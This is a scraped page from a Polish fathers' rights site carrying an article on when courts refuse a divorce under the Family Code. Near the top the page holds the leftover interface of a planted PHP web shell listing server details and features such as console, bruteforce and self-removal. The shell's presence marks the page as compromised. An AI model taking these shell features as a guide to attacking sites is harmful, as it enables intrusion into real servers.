W Stronę Ojca i no co ty Tato

Polecamy

opisy na gg po angielsku i w innych językach.

BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut #36 SMP Thu May 19 16:53:59 CEST 2016 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-21 19:46:38
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.166.141.12
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Kiedy sąd nie orzeknie rozwodu?
28.05.2008.

W artykule Rozwód w obliczu prawa pisaliśmy ogólnie o tym, jak prawo a ściślej Kodeks Rodzinny i Opiekuńczy opisuje rozwód.  W tym artykule bliżej przyjrzymy się, co w praktyce oznaczają zapisy k.r.o. Jak je interpretuje Sąd Najwyższy. Kiedy sąd faktycznie może nie udzielić rozwodu ze względu na dziecko? Co oznacza zupełny, a co trwały rozkład pożycia?

Przypomnijmy, kodeks rodzinny i opiekuńczy opisuje warunki rozwodu:

Jeżeli między małżonkami nastąpił zupełny i trwały rozkład pożycia, każdy z małżonków może żądać, ażeby sąd rozwiązał małżeństwo przez rozwód.

Na czym polega zupełność, a na czym trwałość rozkładu pożycia?


Generalnie można powiedzieć, że o zupełności rozkładu mówimy wtedy, kiedy w pożyciu małżeńskim zanikają 3 rodzaje więzi.

-duchowa - miłość

-fizyczna - seks

-gospodarcza – wspólne życie


W interpretacjach prawniczych zwraca się uwagę, że zakłócenia w sferze fizycznej i gospodarczej mogą być spowodowane zewnętrznymi przyczynami. Krótko mówiąc często nie stanowią o rozpadzie związku. Dzieje się tak w przypadku choroby, kiedy małżonek leży w szpitalu; wyjazdu zarobkowego za granicę.

Uważa się natomiast, że brak więzi duchowej zawsze będzie przejawem rozkładu pożycia. SN stwierdził, że w przypadku, zupełnego rozkładu więzi fizycznej i duchowej utrzymują się nadal pewne elementy więzi gospodarczej i jest to wywołane szczególnymi okolicznościami – rozkład można uznać za zupełny.


Sądy stoją na stanowisku, że nawet sporadyczne stosunki fizyczne świadczą o „niezpuełności” rozkładu pożycia – stąd na sprawie rozwodowej często pojawia się pytanie o ostatni stosunek fizyczny. Często zdarza się, że sąd dowiadując się, że ostatni stosunek miał miejsce w niedawnej przeszłości nie daje rozwodu.


Rozkład pożycia nie wyklucza pozytywnych stosunków między małżonkami. Nie chodzi tu o jakąkolwiek więź, ale o więź charakterystyczną dla małżeństwa.


Podsumowując, sąd bada rozkład pożycia w trzech sferach: duchowej, fizycznej i gospodarczej. Wydaje się że kluczowymi dla sąd są te dwie pierwsze, zwłaszcza jeśli wziąć pod uwagę kiepską sytuację mieszkaniową Polaków.Co to jest trwałości rozkładu pożycia?

O zupełności rozkładu pożycia małżeńskiego mówimy w sytuacji, kiedy trudno spodziewać się zmiany tego stanu rzeczy - powrotu małżonków do wspólnego życia.

Co ważne, nie ma w tym wypadku konieczności stwierdzenia, że powrót małżonków do wspólnego życia jest bezwzględnie niemożliwy. Sąd opiera się na tzw. doświadczeniu życiowym.

Często ocenia się trwałość rozkładu porównując długość okresu od pogorszenia się stosunków między małżonkami do długości stażu małżeńskiego. Zakłada się, że im dłuższy staż małżeński, tym większe prawdopodobieństwo, że nieporozumienia czy rozstanie nie doprowadzą do całkowitego rozkładu pożycia. Prawo jednak nie uzależnia orzeczenia rozwodu od upływu lat.


W wyjątkowych sytuacjach uznaje się rozkład pożycia za trwały od razu: np. para nie w ogóle nie podjęła pożycia, albo zaraz po ślubie okazuje się, że jedna ze stron ma intymne kontakty z osobą trzecią itd.

SN stwierdził, że stanowisko jednej strony, która chce wznowić pożycie małżeńskie, nie musi wystarczać do uznania niezupełności i nietrwałości rozkładu. Dlatego, że druga osoba może uniemożliwić kontynuację małżeństwa.


Kiedy rozwód jest niedopuszczalny:


Kiedy zagrożone jest dobro dziecka?

Wiadomo, że w sytuacji samego konfliktu cierpi dziecko. Czyli w sytuacji „okołorozwodowej”

dzieci tak czy inaczej ponoszą tego koszty. Dlatego sąd, w swojej ocenie porównuje sytuację dziecka z okresu „okołorozwodowego” z potencjalną sytuacją po rozwodzie. Sąd nie orzeknie rozwodu, jeśli ustali, że sytuacja dziecka pogorszy się w porównaniu do dotychczasowej sytuacji. Podaje się przykład rodziny wielodzietnej, gdzie małżonkowie mało zarabiają. W takiej sytuacji sytuacja dzieci mogłaby się znacznie pogorszyć.


SN wyjaśnił, że przy ocenie na ile dobro małoletniego może ucierpieć w wyniku rozwodu, trzeba przede wszystkim wziąć pod uwagę możliwe osłabienie więzi z dzieckiem małżonka, przy którym nie pozostaną dzieci.


Rozwód nie jest także dopuszczalny, jeśli stoi w sprzeczności z zasadami współżycia społecznego:

np. współmałżonek jest nieuleczalnie chory, wymaga stałej pomocy moralnej i materialnej, a rozwód byłby dla niego rażącą krzywdą.


Jak widać sam kodeks, a nawet jego interpretacja nie stoi w jawnej sprzeczności z interesami ojców. Problemy tkwią w szczegółach, np. tych dotyczących egzekucji.


Źródło: Haak, Ustanie małżeństwa; Komentarz do k.r.o.

 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Co zmieniu nowelizacja KRiO?
 
Czy opieka wspólna po rozwodzie to dobre rozwiązanie dla dziecka?
 
Czy znasz nowy kodeks rodzinny?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


21.06.2018.